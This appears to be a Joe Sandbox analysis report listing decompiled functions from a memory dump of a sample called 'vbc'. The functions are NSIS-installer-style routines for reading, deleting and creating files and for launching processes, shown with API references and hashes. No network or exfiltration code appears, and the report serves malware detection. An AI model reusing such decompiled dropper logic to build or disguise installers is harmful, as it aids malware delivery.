			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x7a8af8;
					 *0x79f734 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040347F(4);
				if(_t22 >= 0) {
					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x79f734 =  *0x79f734 + 4;
						_t36 = E0040347F(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x79f734 =  *0x79f734 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
											goto L18;
										}
										_t30 = E00406210(_a8, 0x793730, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x79f734 =  *0x79f734 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x0040337b
0x00403384
0x0040338d
0x00403391
0x0040339c
0x0040339c
0x004033a4
0x004033ab
0x004033bd
0x004033c4
0x00403469
0x00403469
0x00000000
0x004033ca
0x004033cd
0x004033d9
0x004033dd
0x00403477
0x00403477
0x004033e3
0x004033e6
0x00403445
0x0040344b
0x0040344d
0x0040344d
0x0040345f
0x00403467
0x0040346e
0x00403471
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e8
0x004033eb
0x00000000
0x004033f1
0x004033f6
0x004033fd
0x00403400
0x00403402
0x00403402
0x0040340f
0x00403419
0x00000000
0x00000000
0x00403422
0x00403429
0x00403441
0x0040346b
0x0040346b
0x0040342b
0x0040342b
0x0040342e
0x00403431
0x00403437
0x0040343d
0x00000000
0x0040343f
0x00000000
0x0040343f
0x0040343d
0x00000000
0x00403429
0x00000000
0x004033f6
0x004033eb
0x004033e6
0x004033dd
0x004033c4
0x00403479
0x0040347c

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C

Strings

07y, xrefs: 004033F1

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FilePointer
String ID: 07y
API String ID: 973152223-1660179758
Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D32 Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406139(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405d33
0x00405d3e
0x00405d43
0x00405d73
0x00000000
0x00405d73
0x00405d4a
0x00405d4b
0x00405d55
0x00405d4d
0x00405d4d
0x00405d4d
0x00405d5d
0x00405d69
0x00405d6d
0x00405d6d
0x00000000
0x00405d5f
0x00000000
0x00405d61

APIs

Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE6 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406AE6(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A77(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}

0x00406af7
0x00406b0e
0x00406b02
0x00406b0c
0x00406b0c
0x00406b19
0x00406b25

APIs

WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C2B Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403C2B() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1); // executed
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C88();
				_t4 = E00405D7A(_t11, 0x7b6000, 7); // executed
				return _t4;
			}

0x00403c2b
0x00403c3a
0x00403c3d
0x00403c3f
0x00403c3f
0x00403c46
0x00403c4e
0x00403c51
0x00403c53
0x00403c53
0x00403c53
0x00403c5a
0x00403c66
0x00403c6c

APIs

CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C3D
CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C51

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2962429428-4017390910
Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F6A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C1C( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B9F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040666E(0x7b4000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2

SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00406045(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040666E(0x7a4790, _a4);
				_t21 = E00405FE8(0x7a4790);
				if(_t21 != 0) {
					E004068F5(_t21);
					if(( *0x7a8ab8 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4790 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4790);
							_push(0x7a4790);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004069A4();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F89(0x7a4790);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F3D();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00406051
0x0040605c
0x00406060
0x00406067
0x00406073
0x00406083
0x00406085
0x0040609d
0x0040609e
0x004060a5
0x004060a6
0x00000000
0x00000000
0x00406089
0x00406090
0x00406098
0x00000000
0x00000000
0x00000000
0x00000000
0x00406090
0x004060a8
0x004060ae
0x00000000
0x004060bc
0x00406075
0x0040607b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040607b
0x00406062
0x00000000

APIs

Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B

Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013

lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0,00000000), ref: 0040609E
GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004060AE

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8ad0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a8c =  *0x7a7a8c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00405C51 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C51(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f90->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405c5a
0x00405c7a
0x00405c82
0x00405c87
0x00000000
0x00405c8d
0x00405c91

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
CloseHandle.KERNEL32(?), ref: 00405C87

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406A3B Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A3B(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069CB(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a43
0x00406a46
0x00406a4d
0x00406a55
0x00406a61
0x00000000
0x00406a68
0x00406a58
0x00406a5f
0x00000000
0x00406a70
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
